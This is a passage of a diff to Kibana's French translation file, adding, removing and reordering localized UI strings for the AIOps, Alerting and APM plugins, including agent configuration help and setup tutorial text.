représentation visuelle de l'impact du champ sur la différence de taux de messages", + "xpack.aiops.correlations.failedTransactions.correlationsTable.logRateLabel": "Taux du log", + "xpack.aiops.correlations.failedTransactions.correlationsTable.pValueColumnTooltip": "L'importance de changements dans la fréquence des valeurs ; des valeurs plus faibles indiquent un changement plus important.", + "xpack.aiops.correlations.failedTransactions.correlationsTable.pValueLabel": "valeur-p", + "xpack.aiops.correlations.highImpactText": "Élevé", + "xpack.aiops.correlations.lowImpactText": "Bas", + "xpack.aiops.correlations.mediumImpactText": "Moyenne", + "xpack.aiops.correlations.veryLowImpactText": "Très bas", + "xpack.aiops.dataGrid.field.documentCountChart.seriesLabel": "compte du document", + "xpack.aiops.dataGrid.field.documentCountChartSplit.seriesLabel": "autre compte du document", + "xpack.aiops.documentCountContent.clearSelectionAriaLabel": "Effacer la sélection", + "xpack.aiops.explainLogRateSpikes.loadingState.doneMessage": "Terminé.", + "xpack.aiops.explainLogRateSpikes.loadingState.loadingFieldCandidates": "Chargement des champs candidats.", + "xpack.aiops.explainLogRateSpikes.loadingState.loadingHistogramData": "Chargement des données d’histogramme.", + "xpack.aiops.explainLogRateSpikesPage.emptyPromptBody": "La fonction Expliquer les pics de taux de log identifie les combinaisons champ/valeur statistiquement significatives qui contribuent à un pic de taux de log.", + "xpack.aiops.explainLogRateSpikesPage.emptyPromptTitle": "Cliquez sur un pic dans l'histogramme pour lancer l'analyse.", + "xpack.aiops.fullTimeRangeSelector.useFullDataExcludingFrozenButtonTooltip": "Utilisez toute la plage de données à l'exception du niveau de données frozen.", + "xpack.aiops.fullTimeRangeSelector.useFullDataIncludingFrozenButtonTooltip": "Utilisez toute la plage de données, y compris le niveau de données frozen, qui peut inclure des résultats de recherche plus lents.", + "xpack.aiops.index.dataViewNotBasedOnTimeSeriesNotificationDescription": "L'analyse des pics de taux de log ne fonctionne que sur des index temporels", + "xpack.aiops.index.fullTimeRangeSelector.errorSettingTimeRangeNotification": "Une erreur s'est produite lors de la définition de la plage temporelle.", + "xpack.aiops.index.fullTimeRangeSelector.moreOptionsButtonAriaLabel": "Plus d'options", + "xpack.aiops.index.fullTimeRangeSelector.noResults": "Aucun résultat ne correspond à vos critères de recherche.", + "xpack.aiops.index.fullTimeRangeSelector.useFullDataButtonLabel": "Utiliser toutes les données", + "xpack.aiops.index.fullTimeRangeSelector.useFullDataExcludingFrozenMenuLabel": "Exclure le niveau de données frozen", + "xpack.aiops.index.fullTimeRangeSelector.useFullDataIncludingFrozenMenuLabel": "Inclure le niveau de données frozen", + "xpack.aiops.miniHistogram.noDataLabel": "S. O.", + "xpack.aiops.progressAriaLabel": "Progression", + "xpack.aiops.rerunAnalysisButtonTitle": "Relancer l’analyse", + "xpack.aiops.searchPanel.invalidSyntax": "Syntaxe non valide", + "xpack.aiops.searchPanel.queryBarPlaceholderText": "Rechercher… (par exemple, status:200 AND extension:\"PHP\")", "xpack.alerting.alertNavigationRegistry.get.missingNavigationError": "La navigation pour le type d'alerte \"{alertType}\" dans \"{consumer}\" n'est pas enregistrée.", "xpack.alerting.alertNavigationRegistry.register.duplicateDefaultError": "La navigation par défaut dans \"{consumer}\" est déjà enregistrée.", "xpack.alerting.alertNavigationRegistry.register.duplicateNavigationError": "La navigation pour le type d'alerte \"{alertType}\" dans \"{consumer}\" est déjà enregistrée.", - "xpack.alerting.api.error.disabledApiKeys": "L'alerting se base sur les clés d'API qui semblent désactivées", - "xpack.alerting.appName": "Alerting", - "xpack.alerting.builtinActionGroups.recovered": "Récupéré", - "xpack.alerting.injectActionParams.email.kibanaFooterLinkText": "Afficher la règle dans Kibana", - "xpack.alerting.rulesClient.invalidDate": "Date non valide pour le {field} de paramètre : \"{dateValue}\"", - "xpack.alerting.rulesClient.validateActions.invalidGroups": "Groupes d'actions non valides : {groups}", - "xpack.alerting.rulesClient.validateActions.misconfiguredConnector": "Connecteurs non valides : {groups}", + "xpack.alerting.rulesClient.invalidDate": "Date non valide pour le {field} de paramètre : \"{dateValue}\"", + "xpack.alerting.rulesClient.validateActions.invalidGroups": "Groupes d'actions non valides : {groups}", + "xpack.alerting.rulesClient.validateActions.misconfiguredConnector": "Connecteurs non valides : {groups}", "xpack.alerting.ruleTypeRegistry.get.missingRuleTypeError": "Le type de règle \"{id}\" n'est pas enregistré.", "xpack.alerting.ruleTypeRegistry.register.customRecoveryActionGroupUsageError": "Le type de règle [id=\"{id}\"] ne peut pas être enregistré. Le groupe d'actions [{actionGroup}] ne peut pas être utilisé à la fois comme groupe de récupération et comme groupe d'actions actif.", "xpack.alerting.ruleTypeRegistry.register.duplicateRuleTypeError": "Le type de règle \"{id}\" est déjà enregistré.", - "xpack.alerting.ruleTypeRegistry.register.invalidDefaultTimeoutRuleTypeError": "Le type de règle \"{id}\" a un intervalle par défaut non valide : {errorMessage}.", + "xpack.alerting.ruleTypeRegistry.register.invalidDefaultTimeoutRuleTypeError": "Le type de règle \"{id}\" a un intervalle par défaut non valide : {errorMessage}.", "xpack.alerting.ruleTypeRegistry.register.invalidTimeoutRuleTypeError": "Le type de règle \"{id}\" a un délai d'expiration non valide : {errorMessage}.", "xpack.alerting.ruleTypeRegistry.register.reservedActionGroupUsageError": "Le type de règle [id=\"{id}\"] ne peut pas être enregistré. Les groupes d'actions [{actionGroups}] sont réservés par le framework.", - "xpack.alerting.savedObjects.goToRulesButtonText": "Accéder aux règles", "xpack.alerting.savedObjects.onImportText": "{rulesSavedObjectsLength} {rulesSavedObjectsLength, plural, one {La règle doit être activée} other {Les règles doivent être activées}} après l'importation.", "xpack.alerting.serverSideErrors.expirerdLicenseErrorMessage": "Le type de règle {ruleTypeId} est désactivé, car votre licence {licenseType} a expiré.", "xpack.alerting.serverSideErrors.invalidLicenseErrorMessage": "La règle {ruleTypeId} est désactivée, car elle requiert une licence {licenseType}. Accédez à Gestion des licences pour consulter les options de mise à niveau.", "xpack.alerting.serverSideErrors.unavailableLicenseErrorMessage": "Le type de règle {ruleTypeId} est désactivé, car les informations de licence ne sont pas disponibles actuellement.", + "xpack.alerting.api.error.disabledApiKeys": "L'alerting se base sur les clés d'API qui semblent désactivées", + "xpack.alerting.appName": "Alerting", + "xpack.alerting.builtinActionGroups.recovered": "Récupéré", + "xpack.alerting.injectActionParams.email.kibanaFooterLinkText": "Afficher la règle dans Kibana", + "xpack.alerting.savedObjects.goToRulesButtonText": "Accéder aux règles", "xpack.alerting.serverSideErrors.unavailableLicenseInformationErrorMessage": "Les alertes sont indisponibles – les informations de licence ne sont pas disponibles actuellement.", - "xpack.alerting.taskRunner.warning.maxExecutableActions": "Le nombre maximal d'actions pour ce type de règle a été atteint ; les actions excédentaires n'ont pas été déclenchées.", + "xpack.alerting.taskRunner.warning.maxExecutableActions": "Le nombre maximal d'actions pour ce type de règle a été atteint ; les actions excédentaires n'ont pas été déclenchées.", + "xpack.apm.agentConfig.deleteModal.text": "Vous êtes sur le point de supprimer la configuration du service \"{serviceName}\" et de l'environnement \"{environment}\".", + "xpack.apm.agentConfig.deleteSection.deleteConfigFailedText": "Une erreur est survenue lors de la suppression d'une configuration de \"{serviceName}\". Erreur : \"{errorMessage}\"", + "xpack.apm.agentConfig.deleteSection.deleteConfigSucceededText": "Vous avez supprimé une configuration de \"{serviceName}\" avec succès. La propagation jusqu'aux agents pourra prendre un certain temps.", + "xpack.apm.agentConfig.range.errorText": "{rangeType, select,\n between {doit être compris entre {min} et {max}}\n gt {doit être supérieur à {min}}\n lt {doit être inférieur à {max}}\n other {doit être un entier}\n }", + "xpack.apm.agentConfig.saveConfig.failed.text": "Une erreur est survenue pendant l'enregistrement de la configuration de \"{serviceName}\". Erreur : \"{errorMessage}\"", + "xpack.apm.agentConfig.saveConfig.succeeded.text": "La configuration de \"{serviceName}\" a été enregistrée. La propagation jusqu'aux agents pourra prendre un certain temps.", + "xpack.apm.alerts.anomalySeverity.scoreDetailsDescription": "score {value} {value, select, critical {} other {et plus}}", + "xpack.apm.alertTypes.errorCount.reason": "Le nombre d'erreurs est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", + "xpack.apm.alertTypes.transactionDuration.reason": "La latence de {aggregationType} est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", + "xpack.apm.alertTypes.transactionDurationAnomaly.reason": "Une anomalie {severityLevel} avec un score de {measured} a été détectée dans le dernier {interval} pour {serviceName}.", + "xpack.apm.alertTypes.transactionErrorRate.reason": "L'échec des transactions est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", + "xpack.apm.anomalyDetection.createJobs.failed.text": "Une erreur est survenue lors de la création d'une ou de plusieurs tâches de détection des anomalies pour les environnements de service APM [{environments}]. Erreur : \"{errorMessage}\"", + "xpack.apm.anomalyDetection.createJobs.succeeded.text": "Tâches de détection des anomalies créées avec succès pour les environnements de service APM [{environments}]. Le démarrage de l'analyse du trafic à la recherche d'anomalies par le Machine Learning va prendre un certain temps.", + "xpack.apm.anomalyDetectionSetup.notEnabledForEnvironmentText": "La détection des anomalies n'est pas encore activée pour l'environnement \"{currentEnvironment}\". Cliquez pour continuer la configuration.", + "xpack.apm.compositeSpanCallsLabel": ", {count} appels, sur une moyenne de {duration}", + "xpack.apm.correlations.ccsWarningCalloutBody": "Les données pour l'analyse de corrélation n'ont pas pu être totalement récupérées. Cette fonctionnalité est prise en charge uniquement à partir des versions {version} et ultérieures.", + "xpack.apm.correlations.failedTransactions.helpPopover.basicExplanation": "Les corrélations vous aident à découvrir les attributs qui ont le plus d'influence pour distinguer les échecs et les succès d'une transaction. Les transactions sont considérées comme un échec lorsque leur valeur {field} est {value}.", + "xpack.apm.correlations.fieldContextPopover.addFilterAriaLabel": "Filtrer sur le {fieldName} : \"{value}\"", + "xpack.apm.correlations.fieldContextPopover.calculatedFromSampleDescription": "Calculé à partir d'un échantillon de {sampleSize} documents", + "xpack.apm.correlations.fieldContextPopover.removeFilterAriaLabel": "Exclure le {fieldName} : \"{value}\"", + "xpack.apm.correlations.progressTitle": "Progression : {progress} %", + "xpack.apm.durationDistribution.chart.percentileMarkerLabel": "{markerPercentile}e centile", + "xpack.apm.durationDistributionChart.totalSpansCount": "Total : {totalDocCount} {totalDocCount, plural, one {intervalle} other {intervalles}}", + "xpack.apm.durationDistributionChart.totalTransactionsCount": "Total : {totalDocCount} {totalDocCount, plural, one {transaction} other {transactions}}", + "xpack.apm.durationDistributionChartWithScrubber.selectionText": "Selection : {formattedSelection}", + "xpack.apm.errorGroupDetails.errorGroupTitle": "Groupe d'erreurs {errorGroupId}", + "xpack.apm.errorGroupDetails.viewOccurrencesInDiscoverButtonLabel": "Visualiser {occurrencesCount} {occurrencesCount, plural, one {l'occurrence} other {les occurrences}} dans Discover", + "xpack.apm.errorGroupTopTransactions.column.occurrences.valueLabel": "{occurrences} occ.", + "xpack.apm.errorsTable.occurrences": "{occurrences} occ.", + "xpack.apm.exactTransactionRateLabel": "{value} tpm", + "xpack.apm.fleet_integration.settings.apmAgent.description": "Configurez l'instrumentation pour les applications {title}.", + "xpack.apm.fleet_integration.settings.tailSamplingDocsHelpText": "Pour en savoir plus sur les politiques d'échantillonnage de la queue, consultez notre {link}.", + "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.version.helpText": "Entrez la {versionLink} de l'agent Java Elastic APM qui doit être attachée.", + "xpack.apm.fleetIntegration.javaRuntime.discoveryRulesDescription": "Pour chaque JVM en cours d'exécution, les règles de découverte sont évaluées dans l'ordre où elles sont fournies. La première règle de correspondance détermine le résultat. Découvrez plus d'informations dans le {docLink}.", + "xpack.apm.instancesLatencyDistributionChartTooltipInstancesTitle": "{instancesCount} {instancesCount, plural, one {instance} other {instances}}", + "xpack.apm.kueryBar.placeholder": "Rechercher {event, select,\n transaction {des transactions}\n metric {des indicateurs}\n error {des erreurs}\n other {des transactions, des erreurs et des indicateurs}\n } (par ex. {queryExample})", + "xpack.apm.propertiesTable.agentFeature.noResultFound": "Pas de résultats pour \"{value}\".", + "xpack.apm.serviceGroups.cardsList.serviceCount": "{servicesCount} {servicesCount, plural, one {service} other {services}}", + "xpack.apm.serviceGroups.createFailure.toast.title": "Erreur lors de la création du groupe \"{groupName}\"", + "xpack.apm.serviceGroups.createSucess.toast.title": "Groupe \"{groupName}\" créé", + "xpack.apm.serviceGroups.deleteFailure.toast.title": "Erreur lors de la suppression du groupe \"{groupName}\"", + "xpack.apm.serviceGroups.deleteFailure.unknownId.toast.title": "Erreur lors de la suppression du groupe \"{groupName}\"", + "xpack.apm.serviceGroups.deleteSuccess.toast.title": "Groupe \"{groupName}\" supprimé", + "xpack.apm.serviceGroups.editFailure.toast.title": "Erreur lors de la modification du groupe \"{groupName}\"", + "xpack.apm.serviceGroups.editSucess.toast.title": "Groupe \"{groupName}\" modifié", + "xpack.apm.serviceGroups.groupsCount": "{servicesCount} {servicesCount, plural, =0 {groupe} one {groupe} other {groupes}}", + "xpack.apm.serviceGroups.selectServicesForm.matchingServiceCount": "{servicesCount} {servicesCount, plural, =0 {service correspond} one {service correspond} other {services correspondent}} à la requête", + "xpack.apm.serviceGroups.tour.content.link": "Découvrez plus d'informations dans le {docsLink}.", + "xpack.apm.serviceIcons.serviceDetails.cloud.availabilityZoneLabel": "{zones, plural, =0 {Zone de disponibilité} one {Zone de disponibilité} other {Zones de disponibilité}} ", + "xpack.apm.serviceIcons.serviceDetails.cloud.faasTriggerTypeLabel": "{triggerTypes, plural, =0 {Type de déclencheur} one {Type de déclencheur} other {Types de déclencheurs}} ", + "xpack.apm.serviceIcons.serviceDetails.cloud.functionNameLabel": "{functionNames, plural, =0 {Nom de fonction} one {Nom de fonction} other {Noms de fonction}} ", + "xpack.apm.serviceIcons.serviceDetails.cloud.machineTypesLabel": "{machineTypes, plural, =0{Type de machine} one {Type de machine} other {Types de machines}} ", + "xpack.apm.serviceIcons.serviceDetails.cloud.regionLabel": "{regions, plural, =0 {Region} one {Région} other {Régions}} ", + "xpack.apm.serviceMap.resourceCountLabel": "{count} ressources", + "xpack.apm.serviceNodeMetrics.unidentifiedServiceNodesWarningText": "Nous n'avons pas pu déterminer à quelles JVM ces indicateurs correspondent. Cela provient probablement du fait que vous exécutez une version du serveur APM antérieure à 7.5. La mise à niveau du serveur APM vers la version 7.5 ou supérieure devrait résoudre le problème. Pour plus d'informations sur la mise à niveau, consultez {link}. Vous pouvez également utiliser la barre de recherche de Kibana pour filtrer par nom d'hôte, par ID de conteneur ou en fonction d'autres champs.", + "xpack.apm.serviceOveriew.errorsTableOccurrences": "{occurrences} occ.", + "xpack.apm.servicesTable.environmentCount": "{environmentCount, plural, one {1 environnement} other {# environnements}}", + "xpack.apm.settings.agentKeys.apiKeysDisabledErrorDescription": "Contactez votre administrateur système et reportez-vous aux {link} pour activer les clés d'API.", + "xpack.apm.settings.agentKeys.copyAgentKeyField.title": "Création de la clé \"{name}\" effectuée", + "xpack.apm.settings.agentKeys.crate.failed": "Erreur lors de la création de la clé de l'agent APM \"{keyName}\". Erreur : \"{message}\"", + "xpack.apm.settings.agentKeys.deleteConfirmModal.title": "Supprimer la clé de l'agent APM \"{name}\" ?", + "xpack.apm.settings.agentKeys.invalidate.failed": "Erreur lors de la suppression de la clé de l'agent APM \"{name}\"", + "xpack.apm.settings.agentKeys.invalidate.succeeded": "Suppression de la clé de l'agent APM \"{name}\"", + "xpack.apm.settings.anomalyDetection.jobList.mlDescriptionText": "Pour ajouter la détection des anomalies à un nouvel environnement, créez une tâche de Machine Learning. Vous pouvez gérer les tâches de Machine Learning existantes dans {mlJobsLink}.", + "xpack.apm.settings.apmIndices.applyChanges.failed.text": "Un problème est survenu lors de l'application des index. Erreur : {errorMessage}.", + "xpack.apm.settings.apmIndices.helpText": "Remplace {configurationName} : {defaultValue}", + "xpack.apm.settings.apmIndices.spaceDescription": "Les paramètres des index s'appliquent à l'espace {spaceName}.", + "xpack.apm.settings.customLink.create.failed.message": "Un problème est survenu lors de l'enregistrement du lien. Erreur : \"{errorMessage}\"", + "xpack.apm.settings.customLink.emptyPromptText": "Nous allons y remédier ! Vous pouvez ajouter des liens personnalisés au menu Actions à partir des détails de transaction de chaque service. Créez un lien utile vers le portail d'assistance de votre société, ou ouvrez un rapport de bug. Besoin d'autres idées ? Consultez {customLinkDocLinkText}.", + "xpack.apm.settings.customLink.flyout.link.url.helpText": "Ajoutez les variables des noms de champ à votre URL pour appliquer des valeurs, par ex., {sample}.", + "xpack.apm.settings.customLink.preview.contextVariable.noMatch": "Nous n'avons pas trouvé de valeur correspondante pour {variables} dans le document d'exemple de transaction.", + "xpack.apm.settings.customLink.table.noResultFound": "Pas de résultats pour \"{value}\".", + "xpack.apm.settings.schema.descriptionText": "Nous avons créé un processus simple et transparent pour passer du binaire du serveur APM à Elastic Agent. Attention, il s'agit d'une action {irreversibleEmphasis} qui ne peut être réalisée que par un {superuserEmphasis} bénéficiant d'un accès à Fleet. En savoir plus sur {elasticAgentDocLink}.", + "xpack.apm.settings.schema.disabledReason": "L'option Passer à Elastic Agent n'est pas disponible : {reasons}", + "xpack.apm.settings.schema.success.returnText": "ou revenez simplement à l'{serviceInventoryLink}.", + "xpack.apm.settings.upgradeAvailable.description": "Même si votre intégration APM est configurée, une nouvelle version de l'intégration APM est disponible pour une mise à niveau avec votre stratégie de package. Consultez {upgradePackagePolicyLink} pour tirer le meilleur parti de votre configuration.", + "xpack.apm.spanLinks.combo.childrenLinks": "Liens entrants ({linkedChildren})", + "xpack.apm.spanLinks.combo.parentsLinks": "Liens sortants ({linkedParents})", + "xpack.apm.stacktraceTab.libraryFramesToogleButtonLabel": "{count, plural, one {# cadre de bibliothèque} other {# cadres de bibliothèque}}", + "xpack.apm.transactionDetails.errorCount": "{errorCount, number} {errorCount, plural, one {erreur} other {erreurs}}", + "xpack.apm.transactionDetails.transFlyout.callout.agentDroppedSpansMessage": "L'agent APM qui a signalé cette transaction a abandonné {dropped} intervalles ou plus, d'après sa configuration.", + "xpack.apm.transactionRateLabel": "{displayedValue} tpm", + "xpack.apm.transactionsTable.cardinalityWarning.body": "Le nombre de noms de transactions uniques dépasse la valeur configurée de {bucketSize}. Essayez de reconfigurer vos agents de façon à regrouper les transactions similaires ou augmentez la valeur de {codeBlock}", + "xpack.apm.tutorial.config_otel.description1": "(1) Les agents et SDK OpenTelemetry doivent prendre en charge les variables {otelExporterOtlpEndpoint}, {otelExporterOtlpHeaders} et {otelResourceAttributes}. Certains composants instables peuvent ne pas encore répondre à cette exigence.", + "xpack.apm.tutorial.config_otel.description3": "La liste exhaustive des variables d'environnement, les paramètres de ligne de commande et les extraits de code de configuration (conformes à la spécification OpenTelemetry) se trouvent dans le {otelInstrumentationGuide}. Certains clients OpenTelemetry instables peuvent ne pas prendre en charge toutes les fonctionnalités et nécessitent peut-être d'autres mécanismes de configuration.", + "xpack.apm.tutorial.djangoClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL personnalisée du serveur APM (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.djangoClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une utilisation avancée.", + "xpack.apm.tutorial.dotNetClient.configureAgent.textPost": "Si vous ne transférez pas une instance \"IConfiguration\" à l'agent (par ex., pour les applications non ASP.NET Core) vous pouvez également configurer l'agent par le biais de variables d'environnement. \n Consultez [the documentation]({documentationLink}) pour une utilisation avancée.", + "xpack.apm.tutorial.dotNetClient.download.textPre": "Ajoutez le(s) package(s) d'agent depuis [NuGet]({allNuGetPackagesLink}) à votre application .NET. Plusieurs packages NuGet sont disponibles pour différents cas d'utilisation. \n\nPour une application ASP.NET Core avec Entity Framework Core, téléchargez le package [Elastic.Apm.NetCoreAll]({netCoreAllApmPackageLink}). Ce package ajoutera automatiquement chaque composant d'agent à votre application. \n\n Si vous souhaitez minimiser les dépendances, vous pouvez utiliser le package [Elastic.Apm.AspNetCore]({aspNetCorePackageLink}) uniquement pour le monitoring d'ASP.NET Core ou le package [Elastic.Apm.EfCore]({efCorePackageLink}) uniquement pour le monitoring d'Entity Framework Core. \n\n Si vous souhaitez seulement utiliser l'API d'agent publique pour l'instrumentation manuelle, utilisez le package [Elastic.Apm]({elasticApmPackageLink}).", + "xpack.apm.tutorial.downloadServerRpm": "Vous cherchez les packages 32 bits ? Consultez la [Download page]({downloadPageLink}).", + "xpack.apm.tutorial.downloadServerTitle": "Vous cherchez les packages 32 bits ? Consultez la [Download page]({downloadPageLink}).", + "xpack.apm.tutorial.elasticCloud.textPre": "Pour activer le serveur APM, accédez à [the Elastic Cloud console] (https://cloud.elastic.co/deployments/{deploymentId}/edit) et activez APM et Fleet dans la page de modification du déploiement en cliquant sur Ajouter une capacité, puis cliquez sur Enregistrer. Une fois activé, actualisez la page.", + "xpack.apm.tutorial.flaskClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL personnalisée du serveur APM (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.flaskClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une utilisation avancée.", + "xpack.apm.tutorial.goClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL de serveur APM personnalisée (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.goClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une configuration avancée.", + "xpack.apm.tutorial.goClient.instrument.textPost": "Consultez la [documentation]({documentationLink}) pour obtenir un guide détaillé pour l'instrumentation du code source Go.", + "xpack.apm.tutorial.javaClient.download.textPre": "Téléchargez le fichier jar de l'agent depuis [Maven Central]({mavenCentralLink}). N'ajoutez **pas** l'agent comme dépendance de votre application.", + "xpack.apm.tutorial.javaClient.startApplication.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.", + "xpack.apm.tutorial.javaClient.startApplication.textPre": "Ajoutez l'indicateur \"-javaagent\" et configurez l'agent avec les propriétés du système.\n\n * Définir le nom de service requis (caractères autorisés : a-z, A-Z, 0-9, -, _ et espace)\n * Définir l'URL personnalisée du serveur APM (par défaut : {customApmServerUrl})\n * Définir le token secret du serveur APM\n * Définir l'environnement de service\n * Définir le package de base de votre application", + "xpack.apm.tutorial.jsClient.enableRealUserMonitoring.textPre": "Le serveur APM désactive la prise en charge du RUM par défaut. Consultez la [documentation]({documentationLink}) pour obtenir des détails sur l'activation de la prise en charge du RUM. Lorsque vous utilisez l'intégration APM avec Fleet, le support RUM est automatiquement activé.", + "xpack.apm.tutorial.jsClient.installDependency.commands.setCustomApmServerUrlComment": "Définir l'URL de serveur APM personnalisée (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.jsClient.installDependency.textPost": "Les intégrations de framework, tel que React ou Angular, ont des dépendances personnalisées. Consultez la [integration documentation]({docLink}) pour plus d'informations.", + "xpack.apm.tutorial.nodeClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL personnalisée du serveur APM (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.nodeClient.configure.textPost": "Consultez [the documentation]({documentationLink}) pour une utilisation avancée, notamment pour connaître l'utilisation avec [Babel/ES Modules]({babelEsModulesLink}).", + "xpack.apm.tutorial.otel.configure.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.\n\n", + "xpack.apm.tutorial.otel.configureAgent.textPre": "Spécifiez les paramètres OpenTelemetry suivants dans le cadre du démarrage de votre application. Notez que les SDK OpenTelemetry exigent du code de démarrage en plus de ces paramètres de configuration. Pour plus de détails, consultez la [documentation OpenTelemetry Elastic]({openTelemetryDocumentationLink}) et les [guides d'instrumentation OpenTelemetry]({openTelemetryInstrumentationLink}).", + "xpack.apm.tutorial.otel.download.textPre": "Consultez les [guides d'instrumentation OpenTelemetry]({openTelemetryInstrumentationLink}) pour télécharger l'agent ou le SDK OpenTelemetry pour votre langage.", + "xpack.apm.tutorial.phpClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.\n\n", + "xpack.apm.tutorial.phpClient.download.textPre": "Téléchargez le package correspondant à votre plateforme depuis [GitHub releases]({githubReleasesLink}).", + "xpack.apm.tutorial.phpClient.installPackage.textPost": "Consultez la [documentation]({documentationLink}) pour les commandes d'installation sur les autres plateformes prises en charge et pour l'installation avancée.", + "xpack.apm.tutorial.rackClient.createConfig.commands.setCustomApmServerComment": "Définir l'URL de serveur APM personnalisée (par défaut : {defaultServerUrl})", + "xpack.apm.tutorial.rackClient.createConfig.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.\n\n", + "xpack.apm.tutorial.rackClient.createConfig.textPre": "Créez un fichier config {configFile} :", + "xpack.apm.tutorial.railsClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.\n\n", + "xpack.apm.tutorial.railsClient.configure.textPre": "APM se lance automatiquement au démarrage de l'application. Configurer l'agent, en créant le fichier config {configFile}", + "xpack.apm.tutorial.specProvider.longDescription": "Le monitoring des performances applicatives (APM) collecte les indicateurs et les erreurs de performance approfondies depuis votre application. Cela vous permet de monitorer les performances de milliers d'applications en temps réel. [Learn more]({learnMoreLink}).", + "xpack.apm.tutorial.windowsServerInstructions.textPost": "Remarque : si l'exécution du script est désactivée dans votre système, vous devez définir la politique d'exécution de la session en cours de sorte que l'exécution du script soit autorisée. Par exemple : {command}.", + "xpack.apm.tutorial.windowsServerInstructions.textPre": "1. Téléchargez le fichier zip APM Server Windows depuis [Download page]({downloadPageLink}).\n2. Extrayez le contenu du fichier zip dans {zipFileExtractFolder}.\n3. Renommez le répertoire {apmServerDirectory} en \"APM-Server\".\n4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n5. Dans l'invite PowerShell, exécutez les commandes suivantes pour installer le serveur APM en tant que service Windows :", + "xpack.apm.unsavedChanges": "{unsavedChangesCount, plural, =0{0 modification non enregistrée} one {1 modification non enregistrée} other {# modifications non enregistrées}} ", + "xpack.apm.waterfall.errorCount": "{errorCount, plural, one {Afficher l'erreur liée} other {Afficher # erreurs liées}}", + "xpack.apm.waterfall.spanLinks.badge": "{total} {total, plural, one {lien d'intervalle} other {liens d'intervalle}}", + "xpack.apm.waterfall.spanLinks.tooltip.linkedChildren": "{linkedChildren} entrants", + "xpack.apm.waterfall.spanLinks.tooltip.linkedParents": "{linkedParents} sortants", + "xpack.apm.waterfall.spanLinks.tooltip.title": "{total} {total, plural, one {lien d'intervalle trouvé} other {liens d'intervalle trouvés}}", "xpack.apm.a.thresholdMet": "Seuil atteint", "xpack.apm.addDataButtonLabel": "Ajouter des données", "xpack.apm.agentConfig.allOptionLabel": "Tous", "xpack.apm.agentConfig.apiRequestSize.description": "Taille totale compressée maximale du corps de la requête envoyé à l'API d'ingestion du serveur APM depuis un encodage fragmenté (diffusion HTTP).\nVeuillez noter qu'un léger dépassement est possible.\n\nLes unités d'octets autorisées sont \"b\", \"kb\" et \"mb\". \"1kb\" correspond à \"1024b\".", "xpack.apm.agentConfig.apiRequestSize.label": "Taille de la requête API", - "xpack.apm.agentConfig.apiRequestTime.description": "Durée maximale de l'ouverture d'une requête HTTP sur le serveur APM.\n\nREMARQUE : cette valeur doit être inférieure à celle du paramètre \"read_timeout\" du serveur APM.", + "xpack.apm.agentConfig.apiRequestTime.description": "Durée maximale de l'ouverture d'une requête HTTP sur le serveur APM.\n\nREMARQUE : cette valeur doit être inférieure à celle du paramètre \"read_timeout\" du serveur APM.", "xpack.apm.agentConfig.apiRequestTime.label": "Heure de la requête API", "xpack.apm.agentConfig.captureBody.description": "Pour les transactions qui sont des requêtes HTTP, l'agent peut éventuellement capturer le corps de la requête (par ex., variables POST).\nPour les transactions qui sont initiées par la réception d'un message depuis un agent de message, l'agent peut capturer le corps du message texte.", "xpack.apm.agentConfig.captureBody.label": "Capturer le corps", - "xpack.apm.agentConfig.captureHeaders.description": "Si cette option est définie sur \"true\", l'agent capturera les en-têtes de la requête HTTP et de la réponse (y compris les cookies), ainsi que les en-têtes/les propriétés du message lors de l'utilisation de frameworks de messagerie (tels que Kafka).\n\nREMARQUE : Si \"false\" est défini, cela permet de réduire la bande passante du réseau, l'espace disque et les allocations d'objets.", + "xpack.apm.agentConfig.captureHeaders.description": "Si cette option est définie sur \"true\", l'agent capturera les en-têtes de la requête HTTP et de la réponse (y compris les cookies), ainsi que les en-têtes/les propriétés du message lors de l'utilisation de frameworks de messagerie (tels que Kafka).\n\nREMARQUE : Si \"false\" est défini, cela permet de réduire la bande passante du réseau, l'espace disque et les allocations d'objets.", "xpack.apm.agentConfig.captureHeaders.label": "Capturer les en-têtes", "xpack.apm.agentConfig.chooseService.editButton": "Modifier", "xpack.apm.agentConfig.chooseService.service.environment.label": "Environnement", @@ -7384,39 +6644,33 @@ "xpack.apm.agentConfig.createConfigTitle": "Créer une configuration", "xpack.apm.agentConfig.deleteModal.cancel": "Annuler", "xpack.apm.agentConfig.deleteModal.confirm": "Supprimer", - "xpack.apm.agentConfig.deleteModal.text": "Vous êtes sur le point de supprimer la configuration du service \"{serviceName}\" et de l'environnement \"{environment}\".", "xpack.apm.agentConfig.deleteModal.title": "Supprimer la configuration", - "xpack.apm.agentConfig.deleteSection.deleteConfigFailedText": "Une erreur est survenue lors de la suppression d'une configuration de \"{serviceName}\". Erreur : \"{errorMessage}\"", "xpack.apm.agentConfig.deleteSection.deleteConfigFailedTitle": "La configuration n'a pas pu être supprimée", - "xpack.apm.agentConfig.deleteSection.deleteConfigSucceededText": "Vous avez supprimé une configuration de \"{serviceName}\" avec succès. La propagation jusqu'aux agents pourra prendre un certain temps.", 